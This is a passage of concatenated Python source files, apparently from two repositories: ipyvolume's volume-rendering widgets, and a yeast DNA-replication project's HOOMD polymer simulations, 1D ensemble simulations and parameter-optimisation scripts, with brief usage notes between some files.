e = comp_events[a[1]]
mean = (e["mean"] - cshift) / cscale
stdv = e["stdv"] / cscale_sd
length = e["length"]
ev += [1] + preproc_event(mean, stdv, length)
print >>fo, " ".join(map(str, ev)),
if prev == a[2]:
print >>fo, "NN"
elif not prev or a[2][:-1] == prev[1:]:
print >>fo, "N%c" % a[2][2]
else:
print >>fo, "%c%c" % (a[2][1], a[2][2])
fo.close()
h5.close()
```
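In all three branches above, each event row is written as its (scaled) features followed by a two-character label derived from the basecaller's `move` field. A small standalone restatement of that encoding (the index choices mirror the branches above; `t_to_b` defaults to the identity case):
```python
# Sketch of the move -> two-character label encoding used above.
def event_label(model_state, move, t_to_b=lambda s: s):
    if move == 0:
        return "NN"                                 # no new base
    if move == 1:
        return "N" + t_to_b(model_state[2])         # one new base
    if move == 2:
        return t_to_b(model_state[1]) + t_to_b(model_state[2])  # two new bases
    raise ValueError("unexpected move: %r" % move)

print(event_label("ACGTA", 2))  # "CG"
```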
|
{
"source": "jeammimi/ipyvolume",
"score": 2
}
|
#### File: ipyvolume/ipyvolume/volume.py
```python
import ipywidgets as widgets
import ipywidgets
from traitlets import Unicode
import traitlets
from traittypes import Array
import logging
import numpy as np
from .serialize import array_cube_png_serialization, array_serialization
from .transferfunction import *
import warnings
logger = logging.getLogger("ipyvolume")
_last_volume_renderer = None
_last_figure = None
@widgets.register('ipyvolume.Scatter')
class Scatter(widgets.DOMWidget):
_view_name = Unicode('ScatterView').tag(sync=True)
_view_module = Unicode('ipyvolume').tag(sync=True)
_model_name = Unicode('ScatterModel').tag(sync=True)
_model_module = Unicode('ipyvolume').tag(sync=True)
x = Array(default_value=None).tag(sync=True, **array_serialization)
y = Array(default_value=None).tag(sync=True, **array_serialization)
z = Array(default_value=None).tag(sync=True, **array_serialization)
vx = Array(default_value=None,allow_none=True).tag(sync=True, **array_serialization)
vy = Array(default_value=None,allow_none=True).tag(sync=True, **array_serialization)
vz = Array(default_value=None,allow_none=True).tag(sync=True, **array_serialization)
selected = Array(default_value=None,allow_none=True).tag(sync=True, **array_serialization)
size = traitlets.Float(0.01).tag(sync=True)
size_selected = traitlets.Float(0.02).tag(sync=True)
color = traitlets.Unicode(default_value="red").tag(sync=True)
color_selected = traitlets.Unicode(default_value="white").tag(sync=True)
geo = traitlets.Unicode('diamond').tag(sync=True)
default_style = dict()
default_style["figure.facecolor"] = "black"
default_style["xaxis.color"] = "red"
default_style["yaxis.color"] = "green"
default_style["zaxis.color"] = "blue"
default_style["axes.color"] = "grey"
@widgets.register('ipyvolume.VolumeRendererThree')
class VolumeRendererThree(widgets.DOMWidget):
"""Widget class representing a volume (rendering) using three.js"""
_view_name = Unicode('VolumeRendererThreeView').tag(sync=True)
_view_module = Unicode('ipyvolume').tag(sync=True)
_model_name = Unicode('VolumeRendererThreeModel').tag(sync=True)
_model_module = Unicode('ipyvolume').tag(sync=True)
data = Array(default_value=None, allow_none=True).tag(sync=True, **array_cube_png_serialization)
data_min = traitlets.CFloat().tag(sync=True)
data_max = traitlets.CFloat().tag(sync=True)
tf = traitlets.Instance(TransferFunction, allow_none=True).tag(sync=True, **ipywidgets.widget_serialization)
angle1 = traitlets.Float(0.1).tag(sync=True)
angle2 = traitlets.Float(0.2).tag(sync=True)
scatters = traitlets.List(traitlets.Instance(Scatter), [], allow_none=False).tag(sync=True, **ipywidgets.widget_serialization)
animation = traitlets.Float(1000.0).tag(sync=True)
ambient_coefficient = traitlets.Float(0.5).tag(sync=True)
diffuse_coefficient = traitlets.Float(0.8).tag(sync=True)
specular_coefficient = traitlets.Float(0.5).tag(sync=True)
specular_exponent = traitlets.Float(5).tag(sync=True)
stereo = traitlets.Bool(False).tag(sync=True)
fullscreen = traitlets.Bool(False).tag(sync=True)
width = traitlets.CInt(500).tag(sync=True)
height = traitlets.CInt(400).tag(sync=True)
downscale = traitlets.CInt(1).tag(sync=True)
show = traitlets.Unicode("Volume").tag(sync=True) # for debugging
xlim = traitlets.List(traitlets.CFloat, default_value=[0, 1], minlen=2, maxlen=2).tag(sync=True)
ylim = traitlets.List(traitlets.CFloat, default_value=[0, 1], minlen=2, maxlen=2).tag(sync=True)
zlim = traitlets.List(traitlets.CFloat, default_value=[0, 1], minlen=2, maxlen=2).tag(sync=True)
xlabel = traitlets.Unicode("x").tag(sync=True)
ylabel = traitlets.Unicode("y").tag(sync=True)
zlabel = traitlets.Unicode("z").tag(sync=True)
style = traitlets.Dict(default_value=default_style).tag(sync=True)
#xlim = traitlets.Tuple(traitlets.CFloat(0), traitlets.CFloat(1)).tag(sync=True)
#ylim = traitlets.Tuple(traitlets.CFloat(0), traitlets.CFloat(1)).tag(sync=True)
#zlim = traitlets.Tuple(traitlets.CFloat(0), traitlets.CFloat(1)).tag(sync=True)
def _volume_widets(v, lighting=False):
import ipywidgets
#angle1 = ipywidgets.FloatSlider(min=0, max=np.pi*2, value=v.angle1, description="angle1")
#angle2 = ipywidgets.FloatSlider(min=0, max=np.pi*2, value=v.angle2, description="angle2")
#ipywidgets.jslink((v, 'angle1'), (angle1, 'value'))
#ipywidgets.jslink((v, 'angle2'), (angle2, 'value'))
if lighting:
ambient_coefficient = ipywidgets.FloatSlider(min=0, max=1, step=0.001, value=v.ambient_coefficient, description="ambient")
diffuse_coefficient = ipywidgets.FloatSlider(min=0, max=1, step=0.001, value=v.diffuse_coefficient, description="diffuse")
specular_coefficient = ipywidgets.FloatSlider(min=0, max=1, step=0.001, value=v.specular_coefficient, description="specular")
specular_exponent = ipywidgets.FloatSlider(min=0, max=10, step=0.001, value=v.specular_exponent, description="specular exp")
#angle2 = ipywidgets.FloatSlider(min=0, max=np.pi*2, value=v.angle2, description="angle2")
ipywidgets.jslink((v, 'ambient_coefficient'), (ambient_coefficient, 'value'))
ipywidgets.jslink((v, 'diffuse_coefficient'), (diffuse_coefficient, 'value'))
ipywidgets.jslink((v, 'specular_coefficient'), (specular_coefficient, 'value'))
ipywidgets.jslink((v, 'specular_exponent'), (specular_exponent, 'value'))
widgets_bottom = [ipywidgets.HBox([ambient_coefficient, diffuse_coefficient]),
ipywidgets.HBox([specular_coefficient, specular_exponent])]
else:
widgets_bottom = []
v.ambient_coefficient = 1
v.diffuse_coefficient = 0
v.specular_coefficient = 0
stereo = widgets.ToggleButton(value=v.stereo, description='stereo', icon='eye')
fullscreen = widgets.ToggleButton(value=v.fullscreen, description='fullscreen', icon='arrows-alt')
ipywidgets.jslink((v, 'stereo'), (stereo, 'value'))
ipywidgets.jslink((v, 'fullscreen'), (fullscreen, 'value'))
widgets_bottom += [ipywidgets.HBox([stereo,fullscreen])]
return ipywidgets.VBox(
[v.tf.control(), v,
] + widgets_bottom# , ipywidgets.HBox([angle1, angle2])
)
def volshow(*args, **kwargs):
"""Deprecated: please use ipyvolume.quickvol or use the ipyvolume.pylab interface"""
warnings.warn("Please use ipyvolume.quickvol or use the ipyvolume.pylab interface", DeprecationWarning, stacklevel=2)
return quickvolshow(*args, **kwargs)
def quickquiver(x, y, z, u, v, w, **kwargs):
import ipyvolume.pylab as p3
p3.figure()
p3.quiver(x, y, z, u, v, w, **kwargs)
return p3.current.container
def quickscatter(x, y, z, **kwargs):
import ipyvolume.pylab as p3
p3.figure()
p3.scatter(x, y, z, **kwargs)
return p3.current.container
def quickvolshow(data, lighting=False, data_min=None, data_max=None, tf=None, stereo=False,
width=400, height=500,
ambient_coefficient=0.5, diffuse_coefficient=0.8,
specular_coefficient=0.5, specular_exponent=5,
downscale=1,
level=[0.1, 0.5, 0.9], opacity=[0.01, 0.05, 0.1], level_width=0.1, **kwargs):
"""
Visualize a 3d array using volume rendering
:param data: 3d numpy array
:param lighting: boolean, whether to use lighting; if False, the lighting parameters below are overridden
:param data_min: minimum value to consider for data, if None, computed using np.nanmin
:param data_max: maximum value to consider for data, if None, computed using np.nanmax
:param tf: transfer function (see ipyvolume.transfer_function, or use the argument below)
:param stereo: stereo view for virtual reality (cardboard and similar VR head mount)
:param width: width of rendering surface
:param height: height of rendering surface
:param ambient_coefficient: lighting parameter
:param diffuse_coefficient: lighting parameter
:param specular_coefficient: lighting parameter
:param specular_exponent: lighting parameter
:param downscale: downscale the rendering for better performance, for instance when set to 2, a 512x512 canvas will show a 256x256 rendering upscaled, but it will render twice as fast.
:param level: level(s) for the where the opacity in the volume peaks, maximum sequence of length 3
:param opacity: opacity(ies) for each level, scalar or sequence of max length 3
:param level_width: width of the (gaussian) bumps where the opacity peaks, scalar or sequence of max length 3
:param kwargs: extra argument passed to Volume and default transfer function
:return:
"""
if tf is None: # TODO: should this just call the pylab interface?
#tf = TransferFunctionJsBumps(**kwargs)
tf_kwargs = {}
# level, opacity and level_width may be scalars; normalize them to lists
try:
level[0]
except TypeError:
level = [level]
try:
opacity[0]
except TypeError:
opacity = [opacity] * 3
try:
level_width[0]
except TypeError:
level_width = [level_width] * 3
#clip off lists
min_length = min(len(level), len(level_width), len(opacity))
level = list(level[:min_length])
opacity = list(opacity[:min_length])
level_width = list(level_width[:min_length])
# append with zeros
while len(level) < 3:
level.append(0)
while len(opacity) < 3:
opacity.append(0)
while len(level_width) < 3:
level_width.append(0)
for i in range(1,4):
tf_kwargs["level"+str(i)] = level[i-1]
tf_kwargs["opacity"+str(i)] = opacity[i-1]
tf_kwargs["width"+str(i)] = level_width[i-1]
tf = TransferFunctionWidgetJs3(**tf_kwargs)
if data_min is None:
data_min = np.nanmin(data)
if data_max is None:
data_max = np.nanmax(data)
v = VolumeRendererThree(data=data, data_min=data_min, data_max=data_max, stereo=stereo,
width=width, height=height,
ambient_coefficient=ambient_coefficient,
diffuse_coefficient=diffuse_coefficient,
specular_coefficient=specular_coefficient,
specular_exponent=specular_exponent,
tf=tf, **kwargs)
box = _volume_widets(v, lighting=lighting)
return box
def scatter(x, y, z, color=(1,0,0), s=0.01):
global _last_figure
fig = _last_figure
if fig is None:
fig = volshow(None)
fig.scatter = Scatter(x=x, y=y, z=z, color=color, size=s)
fig.volume.scatter = fig.scatter
return fig
```
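A minimal usage sketch for `quickvolshow` defined above, intended for a Jupyter notebook cell; the Gaussian-blob volume is just illustrative data:
```python
# Sketch: render a synthetic 3d array with the quickvolshow defined above.
import numpy as np
from ipyvolume.volume import quickvolshow

x, y, z = np.mgrid[-3:3:64j, -3:3:64j, -3:3:64j]
data = np.exp(-(x**2 + y**2 + z**2)).astype(np.float32)
# scalar opacity/level_width are broadcast to the three transfer-function bumps
quickvolshow(data, level=[0.3, 0.6, 0.9], opacity=0.03, level_width=0.1)
```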
|
{
"source": "jeammimi/replication_yeast",
"score": 2
}
|
#### File: src/data/crossing_space.py
```python
from replication.simulate import create_initial_configuration
from replication.simulate import load_parameters, minimize
from hoomd import init, group, md, deprecated, dump, analyze
import hoomd
import numpy as np
import os
import sys
import json
if __name__ == "__main__":
param_file = sys.argv[1]
parameters = load_parameters(param_file)
# print(sys.argv)
if len(sys.argv) >= 3:
parameters["visu"] = True
if "sumatra_label" in parameters:
parameters.pop("sumatra_label")
if "sumatra_label" in parameters:
parameters["data_folder"] = os.path.join(parameters["data_folder"],
parameters["sumatra_label"])
else:
print("no extra label")
parameters["data_folder"] = os.path.join(parameters["data_folder"], "")
parameters["filename"] = param_file
print(parameters["data_folder"])
with open(os.path.join(parameters["data_folder"], "params.json"), "w") as f:
s = json.dumps(parameters)
f.write(s)
hoomd.context.initialize() # optionally: hoomd.context.initialize("--mode=cpu")
# print(type(traj["p_origins"]) == list)
# if hoomd.comm.get_rank() == 0:
traj = parameters
snapshot, _, tag_spb, bond_list, plist, Cp, lP = create_initial_configuration(traj)
R = traj["R"]
data_folder = traj["data_folder"]
dcd_period = traj["dcd_period"]
control = traj["control"]
plist = ["A", "B"]
bond_list = ["A-A"]
snapshot.particles.types = plist
snapshot.bonds.types = bond_list
for p in range(len(snapshot.particles.typeid)):
snapshot.particles.typeid[p] = np.random.randint(2)
for p in range(len(snapshot.bonds.typeid)):
snapshot.bonds.typeid[p] = 0
system = init.read_snapshot(snapshot)
xml = deprecated.dump.xml(
filename=data_folder +
"atoms.hoomdxml",
period=None,
group=group.all(),
vis=True)
logger = analyze.log(
filename=data_folder +
'mylog.log',
period=1000,
quantities=[
'temperature',
'potential_energy',
'bond_harmonic_energy',
'external_wall_lj_energy',
"pair_table_energy",
'kinetic_energy',
'volume',
'pressure'],
overwrite=True)
# xml.disable()
# Force_field:
harmonic = md.bond.harmonic()
harmonic.bond_coeff.set(bond_list, k=20.0, r0=1)
def cos_soft(r, rmin, rmax, epsilon, sigma):
# soft cosine repulsion; the returned force is -dV/dr
V = epsilon * (1 + np.cos(r * np.pi / rmax))
F = epsilon * np.pi / rmax * np.sin(r * np.pi / rmax)
return (V, F)
nl = md.nlist.tree(r_buff=0.4, check_period=1)
# nl = md.nlist.stencil(r_buff=0.4, check_period=1)
# nl = md.nlist.cell(r_buff=0.4, check_period=1)
r_cut = 1.5
epsilon = 6.5
table = md.pair.table(width=1000, nlist=nl)
table.pair_coeff.set(plist, plist,
func=cos_soft, rmin=0, rmax=r_cut,
coeff=dict(epsilon=epsilon, sigma=1.0))
if not control:
table.pair_coeff.set("A", "B",
func=cos_soft, rmin=0, rmax=r_cut,
coeff=dict(epsilon=0, sigma=1.0))
sphere = md.wall.group()
sphere.add_sphere(r=R, origin=(0.0, 0.0, 0.0), inside=True)
# plain lj is much slower (at least in the minimisation)
wall_force_slj = md.wall.lj(sphere, r_cut=1.12)
wall_force_slj.force_coeff.set(plist, epsilon=1.0, sigma=1.0,
r_cut=1.12, mode="shift")
# hoomd.comm.barrier()
microtubule_length = None
Spb_g = None
all_move = group.all()
minimize(traj, all_move, system, snapshot, Spb_g, Cp, microtubule_length)
sim_dt = traj["sim_dt"]
seed = traj["seed"]
md.integrate.mode_standard(dt=sim_dt)
method = md.integrate.langevin(group=all_move, kT=1, seed=seed)
snp = system # .take_snapshot()
md.integrate.mode_standard(dt=sim_dt / 4)
hoomd.run(100)
md.integrate.mode_standard(dt=sim_dt / 2)
hoomd.run(100)
dcd = dump.dcd(filename=data_folder + 'poly.dcd',
period=dcd_period, overwrite=True)
hoomd.run(1000000)
dcd.disable()
logger.disable()
```
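HOOMD's tabulated pair potential expects `cos_soft` to return the force as -dV/dr; a quick standalone consistency check against a numerical derivative (epsilon and cutoff match the script above):
```python
# Sketch: verify F == -dV/dr for the soft cosine pair potential above.
import numpy as np

def cos_soft(r, rmin, rmax, epsilon, sigma):
    V = epsilon * (1 + np.cos(r * np.pi / rmax))
    F = epsilon * np.pi / rmax * np.sin(r * np.pi / rmax)
    return (V, F)

r = np.linspace(0.05, 1.45, 200)
V, F = cos_soft(r, 0, 1.5, 6.5, 1.0)
F_num = -np.gradient(V, r)  # numerical -dV/dr
print(np.max(np.abs(F - F_num)[2:-2]))  # ~1e-3 on interior points
```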
#### File: src/data/make_3D_simulation.py
```python
import sys
sys.path.append("./")
from replication.simulate import simulate, load_parameters
import os
import json
import copy
import errno
import numpy as np
"""
def make_sure_path_exists(path):
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise"""
if __name__ == "__main__":
param_file = sys.argv[1]
parameters = load_parameters(param_file)
# print(sys.argv)
# if len(sys.argv) >= 3:
# parameters["visu"] = True
# if "sumatra_label" in parameters:
# parameters.pop("sumatra_label")
if "sumatra_label" in parameters:
parameters["data_folder"] = os.path.join(parameters["data_folder"],
parameters["sumatra_label"])
else:
print("no extra label")
parameters["data_folder"] = os.path.join(parameters["data_folder"], "")
parameters["filename"] = param_file
pd = parameters["data_folder"]
ir = pd.split("/").index("raw")
root = "/".join(pd.split("/")[:ir + 1])
print(root)
for d in pd.split("/")[ir + 1:]:
root += "/" + d
print(root)
if not os.path.exists(root):
os.mkdir(root)
os.makedirs(parameters["data_folder"], exist_ok=True)
with open(os.path.join(parameters["data_folder"], "params.json"), "w") as f:
s = json.dumps(parameters, indent=True)
f.write(s)
if parameters["p_origins"] == "xenope": # Xenopu
sub_sample_ori = parameters.pop("sub_sample_ori")
l_ori = [list(range(int(parameters["len_chrom"][0] * sub_sample_ori)))]
positions = [[]]
# Homogeneous
homogeneous = parameters.get("homogeneous", True)
if homogeneous:
interval = parameters["len_chrom"][0] / 1.0 / len((l_ori[0]))
for i in range(len((l_ori[0]))):
positions[-1].append(int(i * interval + interval * np.random.uniform()))
positions[0] = list(set(positions[0]))
else:
for i in range(len((l_ori[0]))):
positions[0].append(int(round(parameters["len_chrom"][0] * np.random.uniform(), 0)))
positions[0] = list(set(positions[0]))
# else:
# for i in range(len((l_ori[0]))):
# positions[-1].append(parameters["lengths"][0] * np.random.uniform())
positions[0].sort()
# print(positions)
# exit()
parameters["p_origins"] = positions
print(positions)
original = copy.deepcopy(parameters["visu"])
parameters["visu"] = True
simulate(parameters) # generate files for visualisation
parameters["visu"] = original
simulate(parameters)
```
#### File: src/data/make_optimize_1D.py
```python
import sys
sys.path.append("./")
from replication.ensembleSim import ensembleSim
from replication.simulate import load_parameters
from replication.tools import load_ori_position, load_lengths_and_centro
import os
import json
import _pickle as cPickle
from skopt import gp_minimize
from skopt import dump
import numpy as np
def latin(n, ranges, save=False):
"""
Build latin hypercube.
Parameters
----------
n : int
Number of points.
d : int
Size of space.
Returns
-------
pts : ndarray
Array of points uniformly placed in d-dimensional unit cube.
"""
# starting with diagonal shape
d = len(ranges)
pts = np.ones((n, d))
for i in range(n):
pts[i] = pts[i] * i / (n - 1.)
# spread function
def spread(p):
s = 0.
for i in range(n):
for j in range(n):
if i > j:
s = s + 1. / np.linalg.norm(np.subtract(p[i], p[j]))
return s
# minimizing spread function by shuffling
currminspread = spread(pts)
if save:
Save = [pts]
for m in range(1000):
p1 = np.random.randint(n)
p2 = np.random.randint(n)
k = np.random.randint(d)
newpts = np.copy(pts)
newpts[p1, k], newpts[p2, k] = newpts[p2, k], newpts[p1, k]
newspread = spread(newpts)
if newspread < currminspread:
pts = np.copy(newpts)
currminspread = newspread
if save:
Save.append(np.copy(newpts))
for ir, r in enumerate(ranges):
print(r)
pts[::, ir] = (r[1] - r[0]) * pts[::, ir] + r[0]
if save:
return pts, Save
return pts
if __name__ == "__main__":
param_file = sys.argv[1]
parameters = load_parameters(param_file)
# print(sys.argv)
if "sumatra_label" in parameters:
parameters["data_folder"] = os.path.join(parameters["data_folder"],
parameters["sumatra_label"])
parameters.pop("sumatra_label")
else:
print("no extra label")
parameters["data_folder"] = os.path.join(parameters["data_folder"], "")
parameters["filename"] = param_file
print(parameters["data_folder"])
with open(os.path.join(parameters["data_folder"], "params.json"), "w") as f:
s = json.dumps(parameters)
f.write(s)
# ensembleSim(Nsim, Nori, Ndiff, lengths, p_on, p_off, only_one,
# all_same_ori=False, l_ori=[], cut=10)
if type(parameters["lengths"]) == str:
lengths, _ = load_lengths_and_centro(parameters["lengths"], parameters["coarse"])
parameters["lengths"] = lengths
if type(parameters["Nori"]) == str and parameters["Nori"] != "xenope":
l_ori = load_ori_position(parameters["Nori"],
parameters["ori_type"],
parameters["lengths"],
parameters["coarse"])
if parameters["Nori"] == "xenope":
l_ori = [list(range(parameters["lengths"][0]))]
parameters.pop("filename")
data_folder = parameters.pop("data_folder")
parameters.pop("ori_type")
c = parameters.pop("coarse")
parameters["Nori"] = l_ori
def error(x, returnv=False, c=c):
only_one = len(x) == 2
Ndiff = int(x[0])
p_on = x[1]
p_off = 0.2 if only_one else x[2]
E = ensembleSim(parameters["Nsim"], l_ori, Ndiff, parameters["lengths"],
p_on=p_on, p_off=p_off, only_one=only_one,
dt_speed=parameters["dt_speed"],
fork_speed=parameters["fork_speed"],
gindin=parameters["gindin"],
p_v=parameters["p_v"],
random=True,
all_same_ori=True)
E.run_all(40000, correlation=False)
if returnv:
return E
else:
if parameters["Nori"] == "xenope":
c = 1
else:
c = c / 1000
# print(c)
return getattr(E, parameters["optimisation"])(coarse=c)[0]
if parameters["only_one"]:
start = [parameters["rNdiff"], parameters["rp_on"]]
else:
start = [parameters["rNdiff"], parameters["rp_on"], parameters["rp_off"]]
x0 = latin(10, start).tolist()
print(x0)
res = gp_minimize(error, start, n_jobs=1, n_calls=parameters[
"n_calls"], n_random_starts=0, x0=x0)
with open(os.path.join(data_folder, "ensembleSim.pick"), "wb") as f:
cPickle.dump(error(res["x"], returnv=True), f)
dump(res, os.path.join(data_folder, "optimisation.pkl"))
```
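`latin` seeds `gp_minimize` with a space-filling design rather than purely random starting points. A minimal sketch of building such a starting set (the ranges are illustrative; in the script they come from the `rNdiff`/`rp_on`/`rp_off` parameters):
```python
# Sketch: a 10-point latin hypercube over an illustrative 2-D search box,
# mirroring how x0 is built for gp_minimize above. Assumes latin() is
# importable from the script above (module name is hypothetical).
from make_optimize_1D import latin

ranges = [(50, 500),    # e.g. a range for Ndiff
          (0.01, 0.9)]  # e.g. a range for p_on
x0 = latin(10, ranges).tolist()
print(len(x0), x0[0])   # 10 starting points, each inside the box
```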
#### File: src/data/make_preprocess.py
```python
import sys
sys.path.append("./")
import os
import errno
import glob
import _pickle as cPickle
sys.path.append("../../src/data")
from replication.tools import load_3D_simus
def make_sure_path_exists(path):
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
if __name__ == "__main__":
simu = sys.argv[1]
threeD = False
if len(sys.argv) == 3:
# note: any non-empty second argument enables 3D mode (bool("False") is True)
threeD = bool(sys.argv[2])
# print(sys.argv)
root = "data/raw"
two = True
if not threeD:
with open(root + "/" + simu + "/" + "ensembleSim.pick", "rb") as f:
tmp_simu = cPickle.load(f)
else:
ni = len(glob.glob(root + "/" + simu + "/traj*"))
tmp_simu, lengths, parameters1 = load_3D_simus(root + "/" + simu + "/traj", n=ni, orip=True)
tmp_simu.Nsim = len(tmp_simu.aIts)
tmp_simu.add_precomputed("Mean_replication_time", root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("get_rep_profile", root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("Pol", root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("n3Dsim", root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("passi_acti", root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("passi", root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("acti", root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("Its", root + "/" + simu + "/" + "analysis.hdf5", two=two)
tmp_simu.add_precomputed("nIts", root + "/" + simu + "/" + "analysis.hdf5", two=two)
tmp_simu.add_precomputed("rho_ori", root + "/" + simu + "/" + "analysis.hdf5", two=two)
tmp_simu.add_precomputed("Free_Diff", root + "/" + simu + "/" + "analysis.hdf5", two=two)
tmp_simu.add_precomputed("Free_Diff_bis", root + "/" +
simu + "/" + "analysis.hdf5", two=two)
tmp_simu.add_precomputed("Fds", root + "/" + simu + "/" + "analysis.hdf5", two=two)
tmp_simu.add_precomputed("get_times_replication", root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("get_dist_between_activated_origins",
root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("MeanIts", root + "/" + simu + "/" + "analysis.hdf5", two=two)
tmp_simu.add_precomputed("It_Mean_field_origins", root + "/" + simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("It_Mean_field_simplified", root + "/" +
simu + "/" + "analysis.hdf5")
tmp_simu.add_precomputed("DNAs", root + "/" + simu + "/" + "analysis.hdf5", two=two)
```
#### File: data/replication/ensembleSim.py
```python
from .simulate_1D import simulate
import numpy as np
import _pickle as cPickle
from collections import namedtuple
import os
from tqdm import tqdm
import pandas as pd
import h5py
import json
from scipy.stats import poisson
import copy
from replication.tools import load_ori_position, load_lengths_and_centro
class ensembleSim:
def __init__(self, Nsim, Nori, Ndiff, lengths,
p_on, p_off, only_one, all_same_ori=True,
dt_speed=1,
fork_speed=1,
gindin=True,
p_v=1,
l_ori=[], cut=10, random=False, one_minute=False,
positions=None, ramp=None,
max_ramp=None, ramp_type="linear", strengths=[], hdf5_file=None,
D_Ndiff="pulse", fsd="uniform", variance_fs=2):
self.Nsim = Nsim
self.Nori = Nori
self.Ndiff = Ndiff
self.lengths = lengths
if type(lengths) == str:
raise TypeError("lengths = %s, but should be a list of ints" % lengths)
if lengths and type(lengths[0]) == list:
raise TypeError("lengths = %s, but should be a flat list" % lengths)
assert(type(gindin) == bool)
assert(type(only_one) == bool)
self.p_on = p_on
self.p_off = p_off
self.only_one = only_one
self.all_same_ori = all_same_ori
self.dt_speed = dt_speed
self.fork_speed = fork_speed
self.gindin = gindin
self.p_v = p_v
self.cut = cut
self.l_ori = l_ori
self.random = random
self.one_minute = one_minute
self.positions = positions
self.ramp = ramp
self.max_ramp = max_ramp
self.ramp_type = ramp_type
self.strengths = strengths
self.hdf5_file = hdf5_file
self.D_Ndiff = D_Ndiff
self.fsd = fsd
self.variance_fs = variance_fs
def add_precomputed(self, name, file_hdf5="None", precision=None, two=False):
qt = getattr(self, name)()
with h5py.File(file_hdf5, 'a') as myfile:
quant = myfile.get("analysis")
if myfile.get("analysis") is None:
quant = myfile.create_group("analysis")
if quant.get(name) is not None:
print(name, "Allready computed")
return
# print(quant.get(name))
# print(type(qt[0]))
if qt != [] and type(qt) in [tuple, list] and type(qt[0]) in [list, np.ndarray]:
prop = quant.create_group(name)
if precision:
prop.create_dataset("precision", data=precision)
maxi = None
if two:
maxi = 2
for i in range(len(qt[:maxi])):
if precision:
prop.create_dataset(str(i), data=list(
map(lambda x: int(x * precision), qt[i])))
else:
prop.create_dataset(str(i), data=np.array(qt[i]))
else:
prop = quant.create_dataset(name, data=qt)
def show_parameters(self, show_ori=True):
P = ["Nsim", "Nori", "Ndiff", "lengths", "p_on", "p_off",
"only_one", "all_same_ori", "dt_speed",
"fork_speed", "gindin", "p_v", "cut", "l_ori", "ramp", "max_ramp"]
for parameter in P:
if (parameter == "l_ori" or parameter == "Nori") and not show_ori:
print(parameter, self.nori)
continue
if hasattr(self, parameter):
print(parameter, getattr(self, parameter))
else:
print(parameter, "Not defined")
def data(self):
return [self.aIts,
self.aFts,
self.aFds,
self.aRps,
self.aDNAs,
self.raDNAs,
self.aUnrs,
self.aFree_origins]
def n3Dsim(self):
v = self.try_load_property("n3Dsim")
if v is not None:
return v
return len(self.aIts)
def load_data(self, data):
self.aIts, self.aFts, self.aFds, self.aRps, self.aDNAs, self.raDNAs, self.aUnrs, self.aFree_origins = data
unr = np.sum(np.array(self.aUnrs), axis=1)
self.anIts = self.aIts * unr
def remove_correlations(self):
del self.aIODs
del self.aIRTDs
del self.aTLs
def add_traj(self, N, run_length=10000):
old_nsim = 0 + self.Nsim
self.Nsim = N
self.run_all(run_length, init=False)
self.Nsim = old_nsim + N
def run_all(self, run_length=200, load_from_file=None, correlation=True, skip=[], single=False, init=True, orip=False):
if init:
self.aIts = []
self.aIfs = []
self.aFts = []
self.aFds = []
self.aRps = []
self.aDNAs = []
self.raDNAs = []
self.aUnrs = []
self.aFree_origins = []
self.aFree_Diff_bis = []
self.anIts = []
self.aFree_Diff = []
self.aFiring_Position = []
self.aIODs = []
self.aIRTDs = []
self.aTLs = []
self.record_diffusing = []
self.orip = []
self.aPol = []
self.fork_speeds = []
self.lft_forks = []
found = 0
for sim in tqdm(range(self.Nsim)):
ori = self.Nori
if self.l_ori != []:
ori = self.l_ori
# check dimension of position
positions = self.positions
if self.positions and type(self.positions[0][0]) is list:
positions = self.positions[sim]
strengths = self.strengths
if self.strengths and type(self.strengths[0][0]) is list:
strengths = self.strengths[sim]
Nd = self.Ndiff
max_ramp = self.max_ramp
if self.D_Ndiff == "poisson":
Nd = poisson.rvs(size=1, mu=self.Ndiff)[0]
max_ramp = Nd
if load_from_file is None:
S = simulate(ori,
Nd,
self.lengths,
self.p_on,
self.p_off,
self.only_one,
dt_speed=self.dt_speed,
fork_speed=self.fork_speed,
gindin=self.gindin,
p_v=self.p_v,
random=self.random,
positions=positions,
ramp=self.ramp,
max_ramp=max_ramp,
ramp_type=self.ramp_type,
strengths=strengths,
fsd=self.fsd,
variance_fs=self.variance_fs
)
S.simulate(run_length)
found += 1
self.record_diffusing.append(S.record_diffusing)
else:
# print("Sim", sim)
if sim in skip:
# print("skip", skip)
continue
# print(sim)
Simu = namedtuple("Simu", ["polys", "oris", "Ndiff_libre_t", "record_diffusing"])
troot = "%s%i/" % (load_from_file, sim + 1)
if single:
troot = load_from_file
file_to_open = troot + "polymer_timing.dat"
try:
if os.path.exists(file_to_open):
with open(file_to_open, "rb") as f:
polys = cPickle.load(f)
oris = [np.array(p.origins) - p.start for p in polys]
Ndiff_libre_t = []
if os.path.exists(troot + "Ndiff_libre_t.dat"):
with open(troot + "Ndiff_libre_t.dat", "rb") as f:
Ndiff_libre_t = cPickle.load(f)
record_diffusing = []
if os.path.exists(troot + "record_diffusing.dat"):
with open(troot + "record_diffusing.dat", "rb") as f:
record_diffusing = cPickle.load(f)
self.record_diffusing.append(record_diffusing)
S = Simu(polys, oris, Ndiff_libre_t, record_diffusing)
found += 1
else:
print(file_to_open, "does not exist")
continue
except EOFError:
print("Not all files in %i readable" % sim)
if found == 1 and self.all_same_ori:
self.l_ori = S.oris
unfinished = False
self.aRps.append([])
for poly in S.polys:
if self.one_minute:
dt = 1
else:
dt = self.dt_speed
if not hasattr(poly, "dt"):
poly.dt = self.dt_speed
poly.max_fs = self.fork_speed
try:
self.aRps[-1].append(poly.get_replication_profile())
if np.any(self.aRps[-1][0] == 0):
print(self.aRps[-1])
raise TypeError
except TypeError:
unfinished = True
print("Sim %i not finished" % sim)
break
if unfinished:
self.aRps.pop(-1)
continue
self.aIts.append([])
self.aIfs.append([])
self.anIts.append([])
self.aFts.append([])
self.aFds.append([])
